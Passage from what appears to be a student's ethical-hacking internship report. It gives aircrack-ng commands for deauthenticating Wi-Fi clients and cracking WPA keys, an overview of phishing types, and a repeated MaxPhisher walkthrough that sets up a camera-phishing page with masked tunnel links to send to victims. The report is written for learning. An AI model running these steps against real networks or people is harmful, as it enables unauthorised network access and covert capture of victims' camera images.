Cracking aspects of the Wi-Fi Security.

Monitoring includes Packer Capturing and exporting the data to text files for processing by any
third-party tool. Attacking includes replay attacks, deauthentication, evil-twin attacks, and packet
injection attacks.
Testing includes the testing of the Wi-Fi cards and driver capabilities based on the capture and
injections. Finally Cracking includes the ability to crack the WEP and WPA PSK keys.

airodump-ng wlan0mon

airodump-ng wlan0mon -c 3 --bssid 18:X:X:X:X:X -w pwd Deauthencating Users

aireplay-ng --deauth 0 -a 18:X:X:X:X:X wlan0mon Cracking Password
aircrack-ng pwd-01.cap -w dict.txt
 CHAPTER-19
PHISHING
Phishing is a type of cyber attack in which attackers use deceptive techniques to trick individuals
into providing sensitive information such as usernames, passwords, credit card numbers, or other
personal and financial details. The term "phishing" is a play on the word "fishing" because attackers
are "fishing" for information.
TYPES OF PHISHING:
Phishers use a variety of techniques to make their attacks look more believable to their targets and
to achieve their goals. Some common phishing techniques include:
● Social Engineering: Social engineering uses psychology to manipulate the targets of phishing
attacks. A phisher may use deception, coercion, bribery, or other techniques to achieve their goal.
● Typosquatting: Phishers may use domains and URLs that look very similar to that of a legitimate,
trusted domain. If the target isn’t paying sufficient attention, then may believe that the link is
legitimate.
● Email Spoofing: A spoofed email is designed so that the display name of the email belongs to
someone that the email recipient trusts. The sender field in an email is just data and is under the
control of the sender.
Phishers use this fact to make emails appear to come from trusted email accounts.
● URL Shortening: Link shorteners like bit.ly conceal the target destination of a URL. Phishers use
this to trick a target into clicking on a link to a phishing page.
● Malicious Redirects: Redirects are designed to send a browser to another page if the original URL
is unavailable, incorrect, or outdated. Malicious redirects can be used to send a user to a phishing
page instead of a legitimate one.
● Hidden Links: Links can be hidden in seemingly harmless text or images. If a user accidentally
clicks the hidden link, they are sent to a phishing page.
● Causing the user to click a link to a malicious website in order to install malware on their device.
● Causing the user to download an infected file and using it to deploy malware.
● Causing the user to click a link to a fake website and submit personal data.
● Causing the user to reply and provide personal data.
● Place of employment
● Job title
● Email address
● Specific information about their job role
● Trusted colleagues, family members, or other contacts, and samples of their writing
This information helps increase the effectiveness of phishing emails and manipulate victims into
performing tasks and activities, such as transferring money.

#3. Whaling
Whaling attacks target senior management and other highly privileged roles. The ultimate goal of whaling is
the same as other types of phishing attacks, but the technique is often very subtle. Senior employees
commonly have a lot of information in the public domain, and attackers can use this information to craft
highly effective attacks.
Typically, these attacks do not use tricks like malicious URLs and fake links. Instead, they leverage highly
personalized messages using information they discover in their research about the victim. For example,
whaling attackers commonly use bogus tax returns to discover sensitive data about the victim and use it to
craft their attack.

#4. Smishing and Vishing

This is a phishing attack that uses a phone instead of written communication. Smishing involves sending
fraudulent SMS messages, while vishing involves phone conversations.
In a typical voice phishing scam, an attacker pretends to be a scam investigator for a credit card company or
bank, informing victims that their account has been breached. Criminals then ask the victim to provide
payment card information, supposedly to verify their identity or transfer money to a secure account (which
is really the attacker’s).
Vishing scams may also involve automated phone calls pretending to be from a trusted entity, asking the
victim to type personal details using their phone keypad.
#5. Angler Phishing
These attacks use fake social media accounts belonging to well-known organizations. The attacker uses an
account handle that mimics a legitimate organization (e.g., “@pizzahutcustomercare”) and uses the same
profile picture as the real company account.
Attackers take advantage of consumers’ tendency to make complaints and request assistance from brands
using social media channels. However, instead of contacting the real brand, the consumer contacts the
attacker’s fake social account.
When attackers receive such a request, they might ask the customer to provide personal information so that
they can identify the problem and respond appropriately. In other cases, the attacker provides a link to a fake
customer support page, which is actually a malicious website.

INSTALLATION OF MAXPHISHER
GOOGLE:-- https://github.com/KasRoudra/MaxPhisher.git {maxphisher}

root@kali:~# git clone https://github.com/KasRoudra/MaxPhisher.git

fatal: destination path 'MaxPhisher' already exists and is not an empty

directory. root@kali:~# cd MaxPhisher/ root@kali:~/MaxPhisher#

python3 maxphisher.py

[+] Please wait!

[?] Do you have loclx access token? [y/N/help]:
Press n
__ __ ____ _ _ _
| \/ | __ ___ _| _ \| |__ (_)___| |__ ___ _ __
| |\/| |/ _` \ \/ / |_) | '_ \| / __| '_ \ / _ \ '__|
| | | | (_| |> <| __/| | | | \__ \ | | | __/ |
|_| |_|\__,_/_/\_\_| |_| |_|_|___/_| |_|\___|_|
[v1.1]
[By KasRoudra]
[01] Login
[02] Image
[03] Video
[04] Audio
[05] Location
[06] IP Tracker
[07] Device
[08] ClipBoard
[a] About [m] More tools [0] Exit [?] Select one of the options > 02
Press the opt like 01/02/03/ (inorder to which u want to hack)
Right now cam phishing
Press 02
[01] Jio Recharge
[02] Festival
[03] Youtube Live
[04] Online Meeting
[a] About [x] Main Menu [0] Exit
[?] Select one of the options > 02

Press the opt like 01/02/03/ (inorder to send the link like above mode)
Right now pressing
Press 02
__ __ ____ _ _ _
| \/ | __ ___ _| _ \| |__ (_)___| |__ ___ _ __
| |\/| |/ _` \ \/ / |_) | '_ \| / __| '_ \ / _ \ '__|
| | | | (_| |> <| __/| | | | \__ \ | | | __/ |
|_| |_|\__,_/_/\_\_| |_| |_|_|___/_| |_|\___|_|

[v1.1]

[By KasRoudra]
[•] Initializing PHP server at localhost:8080....
[+] PHP Server has started successfully!
[•] Initializing tunnelers at same address.....
[+] Your urls are given below :
╭─ CloudFlared─────────────────────────────────────────────────╮
│ URL : https://losing-fist-employee-many.trycloudflare.com │
│ MaskedURL : https://[email protected] │
╰─────────────────────────────────────────────────────────╯
╭─ LocalHostRun
─────────────────────────────────────────────── ──────────╮
│ URL : https://8af2688124f317.lhr.life │
│ MaskedURL : https://[email protected] │
╰────────────────────────────────────────────────────────╯
[?] Wanna try custom link? [y or press enter to skip] : (enter)
Send any above link to get the pics in media

INSTALLATION OF MAXPHISHER

GOOGLE:-- https://github.com/KasRoudra/MaxPhisher.git {maxphisher }

root@kali:~# git clone https://github.com/KasRoudra/MaxPhisher.git fatal: destination path
'MaxPhisher' already exists and is not an empty directory. root@kali:~# cd MaxPhisher/
root@kali:~/MaxPhisher# python3 maxphisher.py
[+] Please wait!

[?] Do you have loclx access token? [y/N/help]:

Press n

__ __ ____ _ _ _
| \/ | __ ___ _| _ \| |__ (_)___| |__ ___ _ __
| |\/| |/ _` \ \/ / |_) | '_ \| / __| '_ \ / _ \ '__|
| | | | (_| |> <| __/| | | | \__ \ | | | __/ |
|_| |_|\__,_/_/\_\_| |_| |_|_|___/_| |_|\___|_|
[v1.1]
[By KasRoudra]
[01] Login
[02] Image
[03] Video
[04] Audio
[05] Location
[06] IP Tracker
[07] Device
[08] ClipBoard
[a] About [m] More tools [0] Exit [?] Select one of the options > 02
Press the opt like 01/02/03/ (inorder to which u want to hack)

Right now cam phishing

Press 02
[01] Jio Recharge
[02] Festival
[03] Youtube Live
[04] Online Meeting
[a] About [x] Main Menu [0] Exit
[?] Select one of the options > 02
Press the opt like 01/02/03/ (inorder to send the link like above mode)
Right now pressing
Press 02
__ __ ____ _ _ _
| \/ | __ ___ _| _ \| |__ (_)___| |__ ___ _ __
| |\/| |/ _` \ \/ / |_) | '_ \| / __| '_ \ / _ \ '__|
| | | | (_| |> <| __/| | | | \__ \ | | | __/ |
|_| |_|\__,_/_/\_\_| |_| |_|_|___/_| |_|\___|_|
[v1.1]
[By KasRoudra]
[•] Initializing PHP server at localhost:8080....
[+] PHP Server has started successfully!
[•] Initializing tunnelers at same address.....
[+] Your urls are given below :

╭─CloudFlared────────────────────────────────────────────╮
│ URL : https://losing-fist-employee-many.trycloudflare.com │
│ MaskedURL : https://[email protected] │
╰────────────────────────────────────────────────────╯
╭─ LocalHostRun ──────────────────────────────── ──────────╮
│ URL : https://8af2688124f317.lhr.life │
│ MaskedURL : https://[email protected] │
╰────────────────────────────────────────────────────╯
[?] Wanna try custom link? [y or press enter to skip] : (enter)
 REFLECTION ON THE INTERNSHIP

An ethical hacking internship is a transformative journey into the complex and critical realm of
cybersecurity. It offers a multidimensional experience, amalgamating theoretical knowledge with
practical application. This immersive opportunity equips individuals with a profound
understanding of vulnerabilities within digital systems and networks. It's a hands-on exploration of
ethical hacking methodologies, emphasizing the significance of proactive defense against cyber
threats.

Throughout this internship, I had the chance to immerse myself in various aspects of cybersecurity.
From learning about penetration testing to dissecting malware and understanding encryption
protocols, every facet illuminated the intricate layers of digital security. The experience was not
just about mastering tools and techniques but also about cultivating a hacker's mindset—a holistic
approach to anticipate and counteract potential breaches.

One of the most enriching aspects was the exposure to real-world scenarios. Working on simulated
environments and conducting ethical hacking exercises helped in comprehending the gravity of
vulnerabilities and the urgency in fortifying systems. Collaborating with seasoned professionals
and peers provided diverse perspectives and insights, fostering a collaborative learning
environment.

Moreover, ethical hacking isn't merely a technical pursuit; it's deeply rooted in ethics and
responsibility. The internship underscored the importance of ethical boundaries, emphasizing the
ethical use of acquired skills for the greater good. It instilled a sense of ethical consciousness,
emphasizing the need to uphold integrity, confidentiality, and respect for privacy while navigating
the cybersecurity landscape.

This internship has not just augmented my technical acumen but has also honed my critical
thinking, problem-solving abilities, and ethical decision-making skills. It has sparked a passion
within me to contribute ethically to the everevolving field of cybersecurity, safeguarding digital
infrastructures and advocating for a secure cyberspace for all.
 CONCLUSION

An ethical hacking internship marks the culmination of an enriching journey into the intricate world
of cybersecurity. It represents not just the end of a learning phase but the beginning of a lifelong
commitment to ethical practices in safeguarding digital landscapes.

Throughout this experience, I've acquired a wealth of technical knowledge, mastering tools and
methodologies crucial in identifying vulnerabilities and fortifying systems. However, beyond the
technical prowess, this internship has ingrained in me a profound ethical understanding a sense of
responsibility and integrity that forms the bedrock of ethical hacking.

The conclusion of this internship isn't merely an endpoint but a launchpad toward a career dedicated
to ethical cybersecurity practices. It's a commitment to applying the skills and insights gained
ethically, ensuring the protection of digital assets and advocating for a secure cyberspace.

As I move forward, I carry with me not just technical expertise but also a deep-seated ethical
consciousness. This internship has instilled in me the values of integrity, confidentiality, and ethical
decision-making—values that will guide every step I take in the cybersecurity domain.

In essence, the conclusion of this ethical hacking internship marks not just the end of a chapter but
the commencement of a journey committed to utilizing hacking skills ethically, contributing
positively to the cybersecurity landscape, and fortifying digital realms for a safer and more secure
future.